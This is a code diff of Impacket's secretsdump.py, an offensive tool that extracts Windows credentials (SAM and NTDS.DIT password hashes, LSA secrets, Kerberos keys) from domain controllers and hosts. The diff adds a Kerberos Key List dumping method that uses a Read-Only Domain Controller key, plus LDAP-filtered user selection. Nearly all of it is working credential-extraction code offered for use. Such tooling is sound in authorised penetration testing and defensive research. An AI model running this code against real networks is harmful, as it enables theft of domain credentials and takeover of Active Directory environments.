@@ -1,7 +1,7 @@
 #!/usr/bin/python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+# Copyright (C) 2023 Fortra. All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -43,7 +43,7 @@
 #   - https://code.google.com/p/creddump/
 #   - https://lab.mediaservice.net/code/cachedump.rb
 #   - https://insecurety.net/?p=768
-#   - http://www.beginningtoseethelight.org/ntsecurity/index.htm
+#   - https://web.archive.org/web/20190717124313/http://www.beginningtoseethelight.org/ntsecurity/index.htm
 #   - https://www.exploit-db.com/docs/english/18244-active-domain-offline-hash-dump-&-forensic-analysis.pdf
 #   - https://www.passcape.com/index.php?section=blog&cmd=details&id=15
 #
@@ -60,8 +60,10 @@ from impacket import version
 from impacket.examples import logger
 from impacket.examples.utils import parse_target
 from impacket.smbconnection import SMBConnection
+from impacket.ldap.ldap import LDAPConnection, LDAPSessionError
 
-from impacket.examples.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes
+from impacket.examples.secretsdump import LocalOperations, RemoteOperations, SAMHashes, LSASecrets, NTDSHashes, \
+    KeyListSecrets
 from impacket.krb5.keytab import Keytab
 try:
     input = raw_input
@@ -71,6 +73,7 @@ except NameError:
 class DumpSecrets:
     def __init__(self, remoteName, username='', password='', domain='', options=None):
         self.__useVSSMethod = options.use_vss
+        self.__useKeyListMethod = options.use_keylist
         self.__remoteName = remoteName
         self.__remoteHost = options.target_ip
         self.__username = username
@@ -79,11 +82,15 @@ class DumpSecrets:
         self.__lmhash = ''
         self.__nthash = ''
         self.__aesKey = options.aesKey
+        self.__aesKeyRodc = options.rodcKey
         self.__smbConnection = None
+        self.__ldapConnection = None
         self.__remoteOps = None
         self.__SAMHashes = None
         self.__NTDSHashes = None
         self.__LSASecrets = None
+        self.__KeyListSecrets = None
+        self.__rodc = options.rodcNo
         self.__systemHive = options.system
         self.__bootkey = options.bootkey
         self.__securityHive = options.security
@@ -97,6 +104,7 @@ class DumpSecrets:
         self.__justDC = options.just_dc
         self.__justDCNTLM = options.just_dc_ntlm
         self.__justUser = options.just_dc_user
+        self.__ldapFilter = options.ldapfilter
         self.__pwdLastSet = options.pwd_last_set
         self.__printUserStatus= options.user_status
         self.__resumeFileName = options.resumefile
@@ -115,6 +123,46 @@ class DumpSecrets:
         else:
             self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
 
+    def ldapConnect(self):
+        if self.__doKerberos:
+            self.__target = self.__remoteHost
+        else:
+            if self.__kdcHost is not None:
+                self.__target = self.__kdcHost
+            else:
+                self.__target = self.__domain
+
+        # Create the baseDN
+        if self.__domain:
+            domainParts = self.__domain.split('.')
+        else:
+            domain = self.__target.split('.', 1)[-1]
+            domainParts = domain.split('.')
+        self.baseDN = ''
+        for i in domainParts:
+            self.baseDN += 'dc=%s,' % i
+        # Remove last ','
+        self.baseDN = self.baseDN[:-1]
+
+        try:
+            self.__ldapConnection = LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcHost)
+            if self.__doKerberos is not True:
+                self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+            else:
+                self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+                                                    self.__aesKey, kdcHost=self.__kdcHost)
+        except LDAPSessionError as e:
+            if str(e).find('strongerAuthRequired') >= 0:
+                # We need to try SSL
+                self.__ldapConnection = LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
+                if self.__doKerberos is not True:
+                    self.__ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+                else:
+                    self.__ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+                                                        self.__aesKey, kdcHost=self.__kdcHost)
+            else:
+                raise
+
     def dump(self):
         try:
             if self.__remoteName.upper() == 'LOCAL' and self.__username == '':
@@ -133,6 +181,12 @@ class DumpSecrets:
             else:
                 self.__isRemote = True
                 bootKey = None
+                if self.__ldapFilter is not None:
+                    logging.info('Querying %s for information about domain users via LDAP' % self.__domain)
+                    try:
+                        self.ldapConnect()
+                    except Exception as e:
+                        logging.error('LDAP connection failed: %s' % str(e))
                 try:
                     try:
                         self.connect()
@@ -146,11 +200,11 @@ class DumpSecrets:
                         else:
                             raise
 
-                    self.__remoteOps  = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost)
+                    self.__remoteOps  = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost, self.__ldapConnection)
                     self.__remoteOps.setExecMethod(self.__options.exec_method)
-                    if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True:
+                    if self.__justDC is False and self.__justDCNTLM is False and self.__useKeyListMethod is False or self.__useVSSMethod is True:
                         self.__remoteOps.enableRegistry()
-                        bootKey             = self.__remoteOps.getBootKey()
+                        bootKey = self.__remoteOps.getBootKey()
                         # Let's check whether target system stores LM Hashes
                         self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
                 except Exception as e:
@@ -163,76 +217,84 @@ class DumpSecrets:
                     else:
                         logging.error('RemoteOperations failed: %s' % str(e))
 
-            # If RemoteOperations succeeded, then we can extract SAM and LSA
-            if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
+            # If the KerberosKeyList method is enable we dump the secrets only via TGS-REQ
+            if self.__useKeyListMethod is True:
                 try:
-                    if self.__isRemote is True:
-                        SAMFileName         = self.__remoteOps.saveSAM()
-                    else:
-                        SAMFileName         = self.__samHive
-
-                    self.__SAMHashes    = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
-                    self.__SAMHashes.dump()
-                    if self.__outputFileName is not None:
-                        self.__SAMHashes.export(self.__outputFileName)
+                    self.__KeyListSecrets = KeyListSecrets(self.__domain, self.__remoteName, self.__rodc, self.__aesKeyRodc, self.__remoteOps)
+                    self.__KeyListSecrets.dump()
                 except Exception as e:
-                    logging.error('SAM hashes extraction failed: %s' % str(e))
+                    logging.error('Something went wrong with the Kerberos Key List approach.: %s' % str(e))
+            else:
+                # If RemoteOperations succeeded, then we can extract SAM and LSA
+                if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA:
+                    try:
+                        if self.__isRemote is True:
+                            SAMFileName = self.__remoteOps.saveSAM()
+                        else:
+                            SAMFileName = self.__samHive
 
-                try:
-                    if self.__isRemote is True:
-                        SECURITYFileName = self.__remoteOps.saveSECURITY()
+                        self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
+                        self.__SAMHashes.dump()
+                        if self.__outputFileName is not None:
+                            self.__SAMHashes.export(self.__outputFileName)
+                    except Exception as e:
+                        logging.error('SAM hashes extraction failed: %s' % str(e))
+
+                    try:
+                        if self.__isRemote is True:
+                            SECURITYFileName = self.__remoteOps.saveSECURITY()
+                        else:
+                            SECURITYFileName = self.__securityHive
+
+                        self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
+                                                       isRemote=self.__isRemote, history=self.__history)
+                        self.__LSASecrets.dumpCachedHashes()
+                        if self.__outputFileName is not None:
+                            self.__LSASecrets.exportCached(self.__outputFileName)
+                        self.__LSASecrets.dumpSecrets()
+                        if self.__outputFileName is not None:
+                            self.__LSASecrets.exportSecrets(self.__outputFileName)
+                    except Exception as e:
+                        if logging.getLogger().level == logging.DEBUG:
+                            import traceback
+                            traceback.print_exc()
+                        logging.error('LSA hashes extraction failed: %s' % str(e))
+
+                # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
+                if self.__isRemote is True:
+                    if self.__useVSSMethod and self.__remoteOps is not None and self.__remoteOps.getRRP() is not None:
+                        NTDSFileName = self.__remoteOps.saveNTDS()
                     else:
-                        SECURITYFileName = self.__securityHive
+                        NTDSFileName = None
+                else:
+                    NTDSFileName = self.__ntdsFile
 
-                    self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps,
-                                                   isRemote=self.__isRemote, history=self.__history)
-                    self.__LSASecrets.dumpCachedHashes()
-                    if self.__outputFileName is not None:
-                        self.__LSASecrets.exportCached(self.__outputFileName)
-                    self.__LSASecrets.dumpSecrets()
-                    if self.__outputFileName is not None:
-                        self.__LSASecrets.exportSecrets(self.__outputFileName)
+                self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
+                                               noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
+                                               useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
+                                               pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
+                                               outputFileName=self.__outputFileName, justUser=self.__justUser,
+                                               ldapFilter=self.__ldapFilter, printUserStatus=self.__printUserStatus)
+                try:
+                    self.__NTDSHashes.dump()
                 except Exception as e:
                     if logging.getLogger().level == logging.DEBUG:
                         import traceback
                         traceback.print_exc()
-                    logging.error('LSA hashes extraction failed: %s' % str(e))
-
-            # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work
-            if self.__isRemote is True:
-                if self.__useVSSMethod and self.__remoteOps is not None:
-                    NTDSFileName = self.__remoteOps.saveNTDS()
-                else:
-                    NTDSFileName = None
-            else:
-                NTDSFileName = self.__ntdsFile
-
-            self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
-                                           noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
-                                           useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
-                                           pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
-                                           outputFileName=self.__outputFileName, justUser=self.__justUser,
-                                           printUserStatus= self.__printUserStatus)
-            try:
-                self.__NTDSHashes.dump()
-            except Exception as e:
-                if logging.getLogger().level == logging.DEBUG:
-                    import traceback
-                    traceback.print_exc()
-                if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
-                    # We don't store the resume file if this error happened, since this error is related to lack
-                    # of enough privileges to access DRSUAPI.
-                    resumeFile = self.__NTDSHashes.getResumeSessionFile()
-                    if resumeFile is not None:
-                        os.unlink(resumeFile)
-                logging.error(e)
-                if self.__justUser and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >=0:
-                    logging.info("You just got that error because there might be some duplicates of the same name. "
-                                 "Try specifying the domain name for the user as well. It is important to specify it "
-                                 "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
-                elif self.__useVSSMethod is False:
-                    logging.info('Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter')
-            self.cleanup()
+                    if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0:
+                        # We don't store the resume file if this error happened, since this error is related to lack
+                        # of enough privileges to access DRSUAPI.
+                        resumeFile = self.__NTDSHashes.getResumeSessionFile()
+                        if resumeFile is not None:
+                            os.unlink(resumeFile)
+                    logging.error(e)
+                    if (self.__justUser or self.__ldapFilter) and str(e).find("ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0:
+                        logging.info("You just got that error because there might be some duplicates of the same name. "
+                                     "Try specifying the domain name for the user as well. It is important to specify it "
+                                     "in the form of NetBIOS domain name/user (e.g. contoso/Administratror).")
+                    elif self.__useVSSMethod is False:
+                        logging.info('Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter')
+                self.cleanup()
         except (Exception, KeyboardInterrupt) as e:
             if logging.getLogger().level == logging.DEBUG:
                 import traceback
@@ -270,6 +332,8 @@ class DumpSecrets:
             self.__LSASecrets.finish()
         if self.__NTDSHashes:
             self.__NTDSHashes.finish()
+        if self.__KeyListSecrets:
+            self.__KeyListSecrets.finish()
 
 
 # Process command-line arguments.
@@ -299,13 +363,21 @@ if __name__ == '__main__':
     parser.add_argument('-outputfile', action='store',
                         help='base output filename. Extensions will be added for sam, secrets, cached and ntds')
     parser.add_argument('-use-vss', action='store_true', default=False,
-                        help='Use the VSS method insead of default DRSUAPI')
+                        help='Use the VSS method instead of default DRSUAPI')
+    parser.add_argument('-rodcNo', action='store', type=int, help='Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)')
+    parser.add_argument('-rodcKey', action='store', help='AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)')
+    parser.add_argument('-use-keylist', action='store_true', default=False,
+                        help='Use the Kerb-Key-List method instead of default DRSUAPI')
     parser.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec '
                         'method to use at target (only when using -use-vss). Default: smbexec')
+
     group = parser.add_argument_group('display options')
     group.add_argument('-just-dc-user', action='store', metavar='USERNAME',
                        help='Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. '
                             'Implies also -just-dc switch')
+    group.add_argument('-ldapfilter', action='store', metavar='LDAPFILTER',
+                       help='Extract only NTDS.DIT data for specific users based on an LDAP filter. '
+                            'Only available for DRSUAPI approach. Implies also -just-dc switch')
     group.add_argument('-just-dc', action='store_true', default=False,
                         help='Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)')
     group.add_argument('-just-dc-ntlm', action='store_true', default=False,
@@ -315,8 +387,8 @@ if __name__ == '__main__':
     group.add_argument('-user-status', action='store_true', default=False,
                         help='Display whether or not the user is disabled')
     group.add_argument('-history', action='store_true', help='Dump password history, and LSA secrets OldVal')
-    group = parser.add_argument_group('authentication')
 
+    group = parser.add_argument_group('authentication')
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
     group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
@@ -325,6 +397,7 @@ if __name__ == '__main__':
     group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
                                                                             ' (128 or 256 bits)')
     group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')
+
     group = parser.add_argument_group('connection')
     group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                                  'ommited it use the domain part (FQDN) specified in the target parameter')
@@ -350,7 +423,7 @@ if __name__ == '__main__':
 
     domain, username, password, remoteName = parse_target(options.target)
 
-    if options.just_dc_user is not None:
+    if options.just_dc_user is not None or options.ldapfilter is not None:
         if options.use_vss is True:
             logging.error('-just-dc-user switch is not supported in VSS mode')
             sys.exit(1)
@@ -368,6 +441,10 @@ if __name__ == '__main__':
         logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS mode')
         sys.exit(1)
 
+    if options.use_keylist is True and (options.rodcNo is None or options.rodcKey is None):
+        logging.error('Both the RODC ID number and the RODC key are required for the Kerb-Key-List approach')
+        sys.exit(1)
+
     if remoteName.upper() == 'LOCAL' and username == '' and options.resumefile is not None:
         logging.error('resuming a previous NTDS.DIT dump session is not supported in LOCAL mode')
         sys.exit(1)
